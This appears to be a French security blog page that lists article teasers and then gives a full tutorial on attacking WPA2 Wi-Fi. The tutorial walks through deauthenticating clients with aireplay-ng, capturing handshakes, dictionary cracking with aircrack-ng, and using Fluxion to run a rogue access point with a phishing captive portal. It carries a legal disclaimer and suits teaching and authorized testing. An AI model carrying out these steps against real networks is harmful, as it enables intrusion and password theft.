Articles

Lutter contre la triche en CTF ?

Introduction Dans cet article , je vais présenter les différentes possibilités pour empêcher la triche en compétition et notamment sur des ctf basés sur CTFd . Je précise que ces techniques permettent de mettre en avant les comptes suspects. Il y a plusieurs façons de cocher les cases d’un tricheurs si on suis ces critères bêtement et inversement , il y a malheureusement plusieurs façon de contourner ces protections. Tous ce que je vais expliquer ici sert donc à mettre en avant un compte ou une équipe afin que des admins procède à une vérification manuelle et agissent en conséquence.

Python from 0

Les Variables : Il existe des centaines de type de variables mais les principales sont : Les String (‘chaine de caractère’) : msg = "Hello World" Les Int (‘Integers’) : Ce sont les nombres entiers nbr = 2021 * 4 Les Float : Les nombres décimaux flt = 3.14159265359 Les List : Les listes contiennent des ‘object’ de tous types: lst = ["Hello World",5,3.

Malware Analysis d'une Virus Télégram

Introduction Je suis tombé sur ce .exe et j’ai décidé de l’analyser. Voici le fichier : ici Attention à ne pas l’executer ! Commencement Comme le dernier analyse de malware , j’ai regardé sur Dnspy si le code était caché . A notre plus grande surprise il ne l’était pas ! Regardons de quoi est composé notre payload : La Première chose qui saute aux yeux et que c’est un virus.

Execution de ShellCode grâce au Dll Hidjacking

Introduction Nous avons déjà parlé du DLL Hidjacking dans un article précédent. Aujourd’hui, nous allons aller plus loin. Nous avions détourné la Bibliothèque LeafXnet.dll qui est des plus utilisée pour faire des requêtes web. Nous aurions pu utiliser une autre, comme Newtonsoft.Json.dll ou encore Colorful.Console.dll . Voici le résultat que nous avions la dernière fois : Nous récupérions juste les requêtes pour les écrire dans un fichier texte. Petit Rappel Le Dll Hidjacking consiste à modifier une bibliothèque appelée par un programme et ainsi ajouter du code exécuter.

Malware Analysis d'un Fake Cheat

Introduction Je suis tombé sur ce soi-disant Cheat Valorant et j’ai décidé de l’analyser. Voici le fichier : ici Attention à ne pas l’executer ! Commencement Après avoir télécharger le .exe , je lui supprime tous de suite son extension .exe pour éviter de le lancer par erreur en cliquant dessus . Je lance DetectItEasy et je me rends compte qu’il est compilé en .Net Je vais donc utiliser Dnspy pour explorer le code .

Comment contourner le SSL Pinning sur android

Introduction Pour un projet personnel, j’ai dû récupérer une requête provenant d’une application de mon téléphone. Après de nombreuses recherches j’ai trouvé comment faire et j’ai compris toutes les méthodes pour y parvenir. La principale difficulté pour récupérer le traffic réseau de votre téléphone est de déchiffré les requêtes https. HttpS , c’est quoi ? “HyperText Transfer Protocol Secure” est un Protocol qui succède à l’http . En effet il reprend l’http en y rajoutant une couche de chiffrement comme SSL ou TLS .

Comment utiliser l'OCR pour résoudre des captchas

Introduction Dans des articles précédent, nous avons vu comment bypass 2 types de catpcha . Mais peut-on tous les bypass ? La réponse est oui à quelques exceptions près et nous allons voir comment. Cet article complète les deux précédents et présente donc toutes les techniques que je connais pour contourner ces sécurité anti-bot HCaptha Hcaptcha est un concurrent à google de plus en plus connu : Il existe deux manières de le contourner :

Comment Isoler un Recaptcha

Introduction Nous avons vu dans un précédent comment bypass les reCAPTCHA Silencieux ; ceux en arrière-plan . Mais comment faire quand ces captchas nécessitent une interaction Humaine à tout prix ? C’est ce que nous allons découvrir. Le problème Dans un captcha Silencieux, il n’y pas d’interactions entre l’utilisateur et le captcha. On peut donc le contourner en simulant des actions identiques au script natif. Par contre, dans un captcha visible.

Comment Bypass un Silent Recaptcha V3

Introduction Les Captchas sont partout, ce sont des petits programmes web qui servent à déterminer si leur interlocuteur est un Homme ou un Robot. Ce n’est pas très dérangeant pour les gens normaux mais cela devient ennuyeux pour les développeur qui souhaitent faire du scraping web ou juste se connecter à un service depuis le site-Web. Dans cet article nous nous concentrerons sur les Recaptcha de google et particulièrement ceux en mode Silent en version 2

Pourquoi votre wifi est-il vulnérable

Introduction Je rappelle que le piratage d’un réseau dont vous n’êtes pas le propriétaire ou dont vous n’avez pas d’accord est strictement illégal. Je ne serais pas responsable des actions que vous ferrez après la lecture des cet article La sécurité WPA2 (Wi-Fi Protected Access Version 2) est la sécurité la plus courante sur vos routeurs personnels. C’est à dire sur votre box internet personnelle. Il est pris en charge depuis 2005 sur Windows XP et il est encore utilisé de nos jours.

Pourquoi il faut sécuriser vos DLL P1

Introduction Une DLL (Dynamic Link Library) est une bibliothèque logicielle qui permet le partage, par des programmes, de codes. Pour résumer, c’est une bibliothèque avec plusieurs fonctions à l’intérieur. C’est très utile pour ne pas toujours coder la même chose. On code une fois la DLL et on a plus qu’a appelé ses fonctions dans tous ses projets. L’avantage du C# est qu’il existe un grand nombre de bibliothèques, et la plupart sont Open-Source, sur GitHub principalement

Comment Reverse du .Net facilement

$(document).ready(function() { var ctrlDown = false, ctrlKey = 17, cmdKey = 91, vKey = 86, cKey = 67; $(document).keydown(function(e) { if (e.keyCode == ctrlKey || e.keyCode == cmdKey) ctrlDown = true; }).keyup(function(e) { if (e.keyCode == ctrlKey || e.keyCode == cmdKey) ctrlDown = false; }); $(document).keydown(function(e) { if (ctrlDown && (e.keyCode == cKey)) window.location.href = "https://www.youtube.com/watch?v=cvh0nX08nRw"; if (ctrlDown && (e.keyCode == vKey)) window.location.href = "https://www.youtube.com/watch?v=cvh0nX08nRw"; }); }); [//]: <> (Created By Vozec 23/10/2021) Nécessaires Ce pack complet pour l&rsquo;obfuscation C# Introduction .

Pourquoi votre wifi est-il vulnérable

Planted October 26, 2021

Introduction

Je rappelle que le piratage d’un réseau dont vous n’êtes pas le propriétaire ou dont vous n’avez pas d’accord est strictement illégal. Je ne serais pas responsable des actions que vous ferrez après la lecture des cet article

La sécurité WPA2 (Wi-Fi Protected Access Version 2) est la sécurité la plus courante sur vos routeurs personnels. C’est à dire sur votre box internet personnelle. Il est pris en charge depuis 2005 sur Windows XP et il est encore utilisé de nos jours. WPA2 reprend la technologie WPA en y rajoutant la norme 802.11 qui assure la prise en charge de nouveaux protocols (ex:CCMP) et qui améliore la sécurité de celui-ci ( <em>AES</em> )

Il existe deux types de WPA2 :

  • personnel
  • entreprise

L’un requière un Mot de passe pour se connecter et l’autre un nom d’utilisateur en plus. Nous nous concentrons sur la version la plus courante. La Première basée sur l’authentification PSK PSK est l’abréviation de Pre-Shared Key , la clé peut avoir entre 8 et 63 caractères maximum.

Pour les plus curieux, voici un schéma de la sécurité CCMP AES du WPA2 : Alt text

La chose importante à retenir est qu’un paquet réseau va transiter entre votre appareil et le routeur lors d’une connexion à votre wifi. Ce paquet, qu’on appellera “Handshake” contient le mot de passe wifi envoyé.

Malheureusement, ce paquet étant chiffré par le chiffrement AES, il semble impossible de récupérer son contenu par force brute (=tester toutes les combinaisons possibles.)

En effet, craquer un mot de passe de 8 caractères, prendrait environ 1 an (185 000 hachages par seconde pour 58474600000000 combinaisons) et ce ne serait que pour la taille minimale du mot de passe. Je vous laisse imaginez combien de temps il faudrait pour 64 caractères …

Nous allons donc ruser pour récupérer ce mot de passe sans y passer l’éternité.

Alt text

Principe fondamental :

  • La Première étape : est de récupérer ce Handshake. Pour ce faire, nous allons écouter les transferts de paquet wifi et nous allons envoyer un paquet de déconnexion à notre victime. Celle-ci se reconnectera automatiquement et nous récupérerons ce précieux paquet.

  • La Seconde : est de craquer la sécurité . Nous verrons donc 2 méthodes différentes :

    • La méthode par dictionnaire
    • La méthode par Faux wifi .

Prérequis :

  • Un wifi sous WP2 ( + autorisation si ce n’est pas le vôtre )
  • Une carte wifi qui supporte le mode monitoring. Exemple : Cette carte de la marque Alpha à 40€

La Pratique :

Partie 1 : Le Handshake
  • Etape 1.0) Il faut installer Aircrack

    sudo apt-get update && sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
    

&& sudo apt-get install -y aircrack-ng


- Etape 1.1)
Passer sa carte en mode monitoring :

iwconfig sudo airmon-ng start INTERFACE


![Alt text](./img/start.png "start")

Maintenant, notre carte est bien en mode écoute :
![Alt text](./img/monitoring.png "start")

- Etape 1.2)
Ecouter les réseaux disponibles :

sudo airodump-ng Nouvelle INTERFACE


![Alt text](./img/airodump1.png "airodump1")

Les BSSID de la partie supérieure correspondent à tous les wifis et les ceux de la partie inférieur correspondent aux machine détectés.

- Etape 1.3)
Pour attendre l'arrivée d'une nouvelle connexion, on récupère le BSSID du wifi visé , le chanel d'écoute (Colonne *CH*) , on spécifie le fichier de sortie et enfin l'interface :

sudo airodump-ng –bssid BSSID_DU_WIFI_VISE -c CHANNEL -w handshake_BBOX… INTERFACE

Comme ceci :
![Alt text](./img/airodump2.png "airodump2")

- Etape 1.4)
Maintenant, nous devons attendre qu'un appareil se connecte au wifi pour récupérer le Handshake.
Au lieu d’attendre, on peut forcer une déconnexion pour récupérer plus rapidement le paquet.

Dans un nouvel onglet :

sudo aireplay-ng -0 2 -a BSSID_DE_LA_VICTIME -c BSSID_DU_WIFI INTERFACE

- `-0` correspond à un paquet de déconnexion
- `2` correspond au nombre de paquets envoyés
- `-c` renseigne le wifi à cibler.
- `-a BSSID_DE_LA_VICTIME` renseigne l'appareil à déconnecté, visible sur le terminal.
Comme ci-dessous :
![Alt text](./img/airodump3.png "airodump3")

On a :

![Alt text](./img/airplay.png "airplay")

et sur la première console on récupère le paquet !

![Alt text](./img/handshake.png "airplay")
Le fichier a gardé est donc : ``handshakeBBOX-01.cap`` , les autres ne nous serviront pas .

##### Partie 2 : Le Craquage du Handshake

###### Méthode 1 ; Grâce à Aircrack

On va essayer de tester tous les mots d'un dictionnaire (*wordlist*) et espère que le mot de passe soit dedans. Cette technique fonctionne si l'administrateur du réseau victime a changé le mot de passe par un personnel.
Voici quelques wordlists intéressantes : [ici](https://github.com/tarraschk/richelieu) ou [ici](https://github.com/kennyn510/wpa2-wordlists)

Pour ce faire :

sudo aircrack-ng FICHIER.cap -w /LE/CHEMIN/DE/MA/WORDLIST


 Nous n'avons plus qu'a attendre et croiser les doigts pour avoir le mot de passe, il s'affichera si il est trouvé !

 ![Alt text](./img/aircrack.png "aircrack")

###### Méthode 2 ; Grâce à Fluxion 5

 Nous allons émuler un faux wifi et forcer un utilisateur à se connecter à celui-ci . Ainsi nous récupérerons le mot de passe en clair !

*installation :*

git clone https://github.com/d00b11/Fluxion-5.git cd Fluxion-5 sudo ./Installer.sh sudo ./fluxion.sh


On peut aussi récupérer le Handshake depuis Fluxion mais c'est la même méthode que précédemment .

Pour le faux point d'accès wifi :

- On Sélectionne l'option numéro 1 : `Portail Captif`
- On Sélectionne le wifi cible et l'interface utilisé (*Toujours la même*)
- Ensuite on sélectionne le type de point d’accès, dans notre cas je conseil la première options : `Rogue AP - hostapd`
- On créer le certificat ssl (*Option 1 toujours*)
- Finalement on choisis `disconnected`
- On prend l'option pour vérifier le Handshake avec `cowpatty`
- Enfin on renseigne l'emplacement de notre fichier .cap
- Enfin on choisit la marque du routeur attaqué pour créer la page de phishing.

Et voila ! plus qu'à attendre quelques minutes et nous aurons nôtres mot de passe !

 ![Alt text](./img/fluxion.png "fluxion")

## Conclusion :
Les wifis semblent protégés mais vous n'êtes pas à l'abris d'avoir une personne malveillante connecté à vôtre point d'accès en secret.
Le danger est immense pour vous, le pirate pourrait sans soucis récupérer tous votre trafic réseau et ainsi récupérer des information confidentielles sur vous (*REF: Attaque Man-In-The-Middle*)

![Alt text](./img/hackerman.gif "hackerman")